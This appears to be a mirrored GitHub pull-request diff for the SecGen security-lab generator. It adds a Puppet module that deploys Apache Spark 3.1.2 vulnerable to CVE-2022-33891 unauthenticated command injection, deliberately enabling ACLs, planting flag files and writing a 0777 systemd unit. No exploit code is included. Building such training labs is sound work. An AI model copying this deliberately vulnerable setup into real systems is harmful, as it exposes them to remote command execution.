mirror of
https://github.com/cliffe/SecGen.git
synced 2026-02-21 11:18:06 +00:00
Merge pull request #251 from JD2344/apache_spark
Add apache spark exploit
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
# apache spark rce init
|
||||
# https://archive.apache.org/dist/spark/spark-3.1.2/spark-3.1.2-bin-hadoop3.2.tgz
|
||||
# https://spark.apache.org/docs/3.1.2/
|
||||
# https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html
|
||||
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
|
||||
contain apache_spark_rce::install
|
||||
contain apache_spark_rce::configure
|
||||
contain apache_spark_rce::service
|
||||
Class['apache_spark_rce::install']
|
||||
-> Class['apache_spark_rce::configure']
|
||||
-> Class['apache_spark_rce::service']
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
|
||||
spark.acls.enable true
|
||||
@@ -0,0 +1,12 @@
|
||||
function apache_spark_rce::cpandbuild(Array $collection, String $filename) {
|
||||
$collection.each |String $item| {
|
||||
file { "/tmp/${item}":
|
||||
ensure => file,
|
||||
source => "puppet:///modules/apache_spark_rce/${item}",
|
||||
}
|
||||
}
|
||||
exec { "rebuild-${filename}":
|
||||
cwd => '/tmp/',
|
||||
command => "/bin/cat ${filename}.parta* >${filename}",
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,26 @@
|
||||
# Class: apache_spark_rce::configure
|
||||
# Configure apache spark and secgen
|
||||
#
|
||||
class apache_spark_rce::configure {
|
||||
$secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
|
||||
$sparkconf='spark-defaults.conf'
|
||||
$leaked_filenames = $secgen_parameters['leaked_filenames']
|
||||
$strings_to_leak = $secgen_parameters['strings_to_leak']
|
||||
|
||||
Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] }
|
||||
|
||||
# We set the acls flag in the config - This ensures its vulnerable
|
||||
file { "/usr/local/spark/conf/${sparkconf}":
|
||||
ensure => file,
|
||||
source => "puppet:///modules/apache_spark_rce/${sparkconf}"
|
||||
}
|
||||
|
||||
::secgen_functions::leak_files { 'spark-flag-leak':
|
||||
storage_directory => '/usr/local/spark/bin/',
|
||||
leaked_filenames => $leaked_filenames,
|
||||
strings_to_leak => $strings_to_leak,
|
||||
owner => 'root',
|
||||
mode => '0750',
|
||||
leaked_from => 'apache_spark_rce',
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,64 @@
|
||||
# Class: apache_spark_rce::install
|
||||
# install process
|
||||
# https://archive.apache.org/dist/spark/spark-3.1.2/spark-3.1.2-bin-hadoop3.2.tgz
|
||||
# https://www.scala-lang.org/download/2.12.10.html
|
||||
class apache_spark_rce::install {
|
||||
Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] }
|
||||
$modulename = 'apache_spark_rce'
|
||||
|
||||
# Install required packages
|
||||
# NOTE: once Debian updates insert scala 2.12+ into statement
|
||||
ensure_packages(['openjdk-11-jdk'], { ensure => 'installed'})
|
||||
|
||||
$scaladeb = 'scala-2.12.10.deb'
|
||||
$releasename = 'spark-3.1.2-bin-hadoop3.2.tgz'
|
||||
$shortrelease = 'spark-3.1.2-bin-hadoop3.2'
|
||||
|
||||
$scalapart = ["${scaladeb}.partaa",
|
||||
"${scaladeb}.partab",
|
||||
"${scaladeb}.partac"]
|
||||
|
||||
$sparkpart = ["${releasename}.partaa",
|
||||
"${releasename}.partab",
|
||||
"${releasename}.partac",
|
||||
"${releasename}.partad",
|
||||
"${releasename}.partae"]
|
||||
|
||||
$pkgtobuild = [[$scalapart, $scaladeb], [$sparkpart, $releasename]]
|
||||
$pkgtobuild.each |Array $pkg| {
|
||||
apache_spark_rce::cpandbuild($pkg[0], $pkg[1])
|
||||
}
|
||||
|
||||
$secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
|
||||
$user = $secgen_parameters['leaked_username'][0]
|
||||
|
||||
$user_home = "/home/${user}"
|
||||
|
||||
# Create user
|
||||
user { $user:
|
||||
ensure => present,
|
||||
home => $user_home,
|
||||
managehome => true,
|
||||
}
|
||||
|
||||
# We run older versions of debian, for now source from local deb file
|
||||
package { 'scala':
|
||||
ensure => latest,
|
||||
provider => apt,
|
||||
source => "/tmp/${scaladeb}",
|
||||
}
|
||||
|
||||
exec { 'unpack-spark':
|
||||
cwd => '/tmp',
|
||||
command => "tar -xf ${releasename}",
|
||||
creates => '/tmp/spark'
|
||||
}
|
||||
-> exec { 'move-spark':
|
||||
cwd => '/tmp',
|
||||
command => "mv /tmp/${shortrelease} /usr/local/spark/",
|
||||
creates => '/usr/local/spark',
|
||||
}
|
||||
-> exec { 'chown-spark':
|
||||
command => "chown -R ${user} /usr/local/spark/",
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,23 @@
|
||||
# Class: apache_spark_rce::service
|
||||
# Service to start spark-shell
|
||||
#
|
||||
class apache_spark_rce::service {
|
||||
$secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
|
||||
$port = $secgen_parameters['port'][0]
|
||||
$user = $secgen_parameters['leaked_username'][0]
|
||||
|
||||
Exec { path => [ '/bin/', '/sbin/' , '/usr/bin/', '/usr/sbin/' ] }
|
||||
|
||||
exec { 'set-port':
|
||||
command => "sed -i 's/8080/${port}/' /usr/local/spark/sbin/start-master.sh",
|
||||
}
|
||||
-> file { '/etc/systemd/system/spark.service':
|
||||
content => template('apache_spark_rce/spark.service.erb'),
|
||||
owner => 'root',
|
||||
mode => '0777',
|
||||
}
|
||||
-> service { 'spark':
|
||||
ensure => running,
|
||||
enable => true,
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,66 @@
|
||||
<?xml version="1.0"?>
|
||||
<vulnerability xmlns="http://www.github/cliffe/SecGen/vulnerability"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||
xsi:schemaLocation="http://www.github/cliffe/SecGen/vulnerability">
|
||||
|
||||
<name>Apache Spark Unauthenticated Command Injection</name>
|
||||
<author>James Davis</author>
|
||||
<module_license>MIT</module_license>
|
||||
<description>The Apache Spark UI offers the possibility to enable ACLs via the configuration
|
||||
option spark.acls.enable.
|
||||
With an authentication filter, this checks whether a user has access permissions to view or
|
||||
modify the application.
|
||||
If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform
|
||||
impersonation by providing an arbitrary user name.
|
||||
A malicious user might then be able to reach a permission check function that will ultimately
|
||||
build a Unix shell command based on their input, and execute it.
|
||||
This will result in arbitrary shell command execution as the user Spark is currently running as.
|
||||
This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions
|
||||
3.2.0 to 3.2.1.</description>
|
||||
|
||||
<type>http</type>
|
||||
<privilege>user_rwx</privilege>
|
||||
<access>remote</access>
|
||||
<platform>linux</platform>
|
||||
<difficulty>low</difficulty>
|
||||
|
||||
<read_fact>port</read_fact>
|
||||
<read_fact>strings_to_leak</read_fact>
|
||||
<read_fact>leaked_filenames</read_fact>
|
||||
|
||||
<default_input into="port">
|
||||
<generator module_path=".*/random_unregistered_port" />
|
||||
</default_input>
|
||||
|
||||
<!-- flags or other secrets exposed after exploitation -->
|
||||
<default_input into="strings_to_leak">
|
||||
<generator type="message_generator" />
|
||||
</default_input>
|
||||
|
||||
<default_input into="leaked_filenames">
|
||||
<generator type="filename_generator" />
|
||||
</default_input>
|
||||
|
||||
<default_input into="leaked_username">
|
||||
<generator type="username_generator" />
|
||||
</default_input>
|
||||
|
||||
<!--optional
|
||||
vulnerability details-->
|
||||
<cve>CVE-2022-33891</cve>
|
||||
<cvss_base_score>8.8</cvss_base_score>
|
||||
<cvss_vector>AV:N/AC:L/Au:N/C:C/I:C/A:C</cvss_vector>
|
||||
<reference>
|
||||
https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html</reference>
|
||||
<reference>
|
||||
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb</reference>
|
||||
<reference>https://spark.apache.org/docs/3.1.2/</reference>
|
||||
<reference>https://archive.apache.org/dist/spark/spark-3.1.2/spark-3.1.2-bin-hadoop3.2.tgz</reference>
|
||||
<software_name>Apache Spark</software_name>
|
||||
<software_license>Apache License 2.0</software_license>
|
||||
|
||||
<requires>
|
||||
<type>update</type>
|
||||
</requires>
|
||||
|
||||
</vulnerability>
|
||||
@@ -0,0 +1,15 @@
|
||||
[Unit]
|
||||
Description=Apache Spark Shell
|
||||
After=network.target
|
||||
|
||||
[Service]
|
||||
Type=forking
|
||||
User=<%= @user %>
|
||||
Environment="PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/spark/sbin"
|
||||
WorkingDirectory=/usr/local/spark/bin/
|
||||
ExecStart=/usr/local/spark/sbin/start-master.sh
|
||||
Restart=on-abort
|
||||
RestartSec=1
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
Reference in New Issue
Block a user